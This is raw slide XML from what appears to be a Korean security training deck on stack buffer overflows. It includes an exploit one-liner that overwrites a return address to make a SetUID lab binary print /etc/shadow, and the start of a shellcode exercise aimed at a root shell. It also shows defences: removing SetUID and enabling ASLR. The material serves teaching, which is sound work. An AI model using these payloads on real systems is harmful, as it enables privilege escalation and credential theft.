          <p:cNvPr id="45058" name="_x564918704">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DB62A56-5106-4732-A942-17A4F364E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91" y="3862882"/>
            <a:ext cx="3070601" cy="24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7" name="_x564938504">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8D06182-F8BD-488A-BBDC-63F3AD814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1" r="131"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6528131" y="993564"/>
            <a:ext cx="3109161" cy="237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DD21F57-1402-4FBE-B2FF-056962736F9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EE55675-A8F8-4E2F-900E-930F6F26EAF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C8D1AF-BF0A-45CE-93C0-3B3C5A977C6C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화살표: 오른쪽 12">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6047B1F9-F462-4312-AEE5-1989BAAF7D68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514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3.2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1">
                <a:ea typeface="HY헤드라인M" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>모바일</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:ea typeface="HY헤드라인M" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> 운영체제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2"/>
            <a:ext cx="8291264" cy="24929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3.2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운영체제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최신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운영체제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28" y="2086291"/>
            <a:ext cx="8786445" cy="453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54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스택 버퍼 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>오버플로우</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 취약점을 이용하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>bar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>함수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./bof64 $(python -c 'print "A"*24+"\x35\x06\x40"‘)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※ bar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>함수의 시작 주소는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>0x0000000000400635</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>이나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인텔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x86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및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x64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아키텍처는 리틀 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>엔디언</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(little endian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000" dirty="0"/>
              <a:t>을 사용하므로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>복귀 주소에 역으로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>즉</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, 0x3506400000000000) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>입력한다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070331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pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8979F9E7-D4D4-4823-98DC-C11837B3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8" y="842130"/>
            <a:ext cx="4945761" cy="2744597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7EB1C4-726B-4F6C-863A-6B565A966529}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="518232" y="4172331"/>
          <a:ext cx="4932807" cy="171113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368581315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749492"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="140817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/shadow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외의 사용자는 접근할 수 없다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783995"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="46085" name="_x564965576">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD50D22F-5C9F-4AB1-991A-AE7A350AC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5" y="4726843"/>
            <a:ext cx="45942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_x564966080">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89101173-22A0-4202-A176-F2AD9B34D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5" y="5242131"/>
            <a:ext cx="3413125" cy="5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6ED209E0-61F7-41D0-8AA4-527392A4E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97" y="42762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6F02A76-5DC1-47DA-9569-0C049FE31AE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6278110" y="434292"/>
          <a:ext cx="4932807" cy="3906393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61157822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049629"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="359994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위의 경우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직후의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그러므로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종료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0x0000000000400635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번지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즉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bar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함수의 시작 주소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복귀한다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31332"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="46087" name="_x564893288">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEAF4901-2586-4E1D-9D27-DAC7A263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16" y="1079106"/>
            <a:ext cx="3297023" cy="267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CA5A70-20C7-4B00-9BF3-CC1B3F3C63F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183086" y="4543284"/>
            <a:ext cx="5616792" cy="19457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1) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>재실행 및 출력 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>리다이렉션으로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/etc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내용을 파일에 출력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./bof64 $(python -c 'print "A"*24+"\x35\x06\x40") &gt; 1.txt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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>) acheck </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>및 파일명을 입력하여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$ acheck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파일명</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Picture 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{173B945A-D41B-48A0-A7DB-8F01DC99C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473" y="5036948"/>
            <a:ext cx="5408912" cy="359554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91A830-1CD8-4D18-B2B4-3D8F8E924E25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59602A3-7E10-4F9E-8FF1-4BCC8DD6EED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C01971-F23F-4103-95FA-1CDA044D2814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8" name="화살표: 오른쪽 17">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F56AF0A1-DD33-438C-B604-98229F633DC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97014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411A4485-4317-4F31-A74B-0E009D382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/Training/Unit/Sys/8</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="44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Buffer Overflow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공격 및 방어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-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대응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/bof64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오버플로우가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발생하더라도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/shadow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파일이 출력되지 않도록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조치하시오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SetUID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u-s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ASLR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활성화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sysctl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 kernel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc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randomize_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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc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space=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02A091AA-30F6-4270-8E55-4E599BAF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CA05AE-7C1C-425E-A911-D5525EA28A2E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100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 복귀 주소를 조작할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이용한 복귀 주소 조작에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B415383-2E2E-4BCE-85C7-5B35E10E2B32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4E1F945-D42A-4F25-B58D-E50A41EB32B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A443AC1F-F004-4379-9D4E-3A82ABE02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2F75C4-5F19-47F6-8EB1-6AAF8693BF3C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6.4)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="10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F7DF4A-2C59-43D2-9E01-C977F57C8F1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D9C5224-3F64-4BC4-8DE3-421FE378DF1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19855F-303D-42F3-BC9E-336CBFA4E05D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" name="화살표: 오른쪽 25">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1920E64-DD82-46FA-83AC-2C0E06899183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7213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/>
              <a:t>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cd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec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/>
              <a:t>/sec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/bof64 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>파일에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000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bof64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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>) SetUID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>설정 해제 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us- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/bof64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bof64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ASLR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>활성화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sysctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>w kernel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>randomize_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>va</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>space=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7" name="Picture 76">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A05B8A24-0AD6-437D-9E5E-16BC5C81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4" y="1286850"/>
            <a:ext cx="4085971" cy="693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8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87373DF7-8165-4254-A426-601E5AD8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28" y="2788920"/>
            <a:ext cx="4039489" cy="6400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911AFB-14D1-43A0-92BB-DDE8EC1868EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="497685" y="3540329"/>
          <a:ext cx="4932807" cy="268649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3879104180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004609"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="23354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SetUID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제거된 경우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권한이 아닌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bof64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실행한 계정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아래의 경우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test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권한으로 실행되므로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/etc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/shadow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접근할 수 없다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098530"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="50177" name="_x564840440">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA46C84B-BAC3-469D-AFCB-A99AF393A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91" y="4314277"/>
            <a:ext cx="4691063" cy="182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0">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6EA22538-687D-4085-8FE9-18C4C1EB99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9990" r="-122"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6310085" y="904875"/>
            <a:ext cx="4843690" cy="49177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B8B31A-EFFF-45B0-9BAA-885DBA00D0F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6308677" y="1523070"/>
          <a:ext cx="4589304" cy="4840394"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4589304">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2128152829"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="2291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0" marR="60260" marT="16660" marB="166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65321"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="412223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ASLR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활성화되면 스택에 있는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tmp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변수의 주소가 실행시마다 변경됨을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영역의 주소는 바뀌지 않음을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0260" marR="60260" marT="16660" marB="1666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801801"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="50179" name="_x564904520">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{018268F2-EA4E-4654-AC73-9D03699D0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" b="886"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6376307" y="2253456"/>
            <a:ext cx="2763947" cy="38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AD6DB3-D844-4C5A-95C9-894E39AA1B0D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A21F91F-1DC3-4908-B966-1CB4DD16BCD8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EF4009-4F0A-4E24-B8DD-1AF25D60AA3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화살표: 오른쪽 15">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CB51EAB-7C62-4CB0-98D3-6CB1BA97D092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7871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ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>확인을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>위해 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>계정으로 변경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err="1"/>
              <a:t>su</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> test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ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>스택 버퍼 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>오버플로우</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 취약점 이용 공격 수행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/sec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/bof64 $(python -c 'print "A"*24+"\x35\x06\x40")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/>
              <a:t>※ /etc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파일 내용 출력이 되지 않음을 확인</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 82">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B975456-1230-4EEF-9616-8DA77ABF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86" y="1296225"/>
            <a:ext cx="4907534" cy="18073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1DB69B-C4ED-4FDF-8DE0-E8E414C60830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루트 계정으로 복귀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$ exit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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>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08284D-650F-4B1A-A1F3-5EDBF3FD238F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226DAED-DF29-4C7C-9638-4E9BB63E060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DEA2D6-0F3A-4B8B-AD25-4708E3D64A9F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화살표: 오른쪽 11">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5547EF7-E9FE-4EA6-BF78-076A8734565A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21578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/Training/Unit/Sys/9</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 9. BOF - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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쉘코드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실행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/stack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 코드가 포함된 페이로드를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만드는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exploit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.c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루트 쉘을 획득하라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디스어셈블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objdump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 intel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바이너리 파일 이름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쉘코드를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주입 및 실행할 수 있다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5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95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이용한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="95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쉘코드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주입 공격에 대응할 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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5.11, 32-bit)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22AB61B-0024-401E-B838-EF52D8D8BB4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0915F6-E77C-4AF8-B5FA-3419167E891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B0AD85-FEC3-4365-A757-F8F8537D18CD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4779363B-6B6A-444B-9500-99AD02B021B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4141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/>
              <a:t>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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec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/>
              <a:t>/sec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/stack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>파일에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000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ls –l stack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/>
              <a:t>/sec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stack.c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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>stack.c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※ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>bof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>함수에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>함수 사용으로 인한 버퍼 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>오버플로우</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 취약점이 존재함을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ojdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>사용하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>disassemble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$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>M intel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>-d stack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>| more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※ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>버퍼 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>시작으로부터</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 복귀 주소 시작까지의 거리는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>28</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>바이트</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBA8D715-5190-4363-ADE3-5ED45E7A1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" t="9793" r="1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="547007" y="1325678"/>
            <a:ext cx="4953262" cy="39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64">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51745194-F882-49F5-84C8-35FB497B0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7" y="2386554"/>
            <a:ext cx="5012436" cy="280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66">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62AC64D9-E07F-4522-A4F9-5985CFEB7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-30" b="50027"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6285593" y="475692"/>
            <a:ext cx="4948464" cy="14429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88A016-BAFF-492D-AA4E-0F78C665F132}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6319647" y="2189525"/>
          <a:ext cx="4532687" cy="4202566"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4532687">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3992703851"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="23356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59516" marR="59516" marT="16454" marB="164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935082"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="395921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진입 시점의 스택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그러므로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buffer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버퍼의 크기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(24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바이트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보다 더 긴 문자열을 넘기면 복귀 주소를 변경시킬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59516" marR="59516" marT="16454" marB="1645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348403"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="47105" name="_x564888896">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EB31F6E-30A6-4412-BD4E-A74C36C72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948" y="2778157"/>
            <a:ext cx="3559973" cy="313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29A799-8B06-46A4-82F5-321CBE3BBB88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7A76B71-EAB6-407A-AF8A-E844ADFC7906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856923-BDBB-4924-909E-1BED1969E78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20157A6D-010D-4CF6-97F5-EAA085FA6A61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38688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1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en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec/exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>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vi exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>.c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en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec/exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>빌드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gcc</a:t>
            </a:r>
            <a:r>
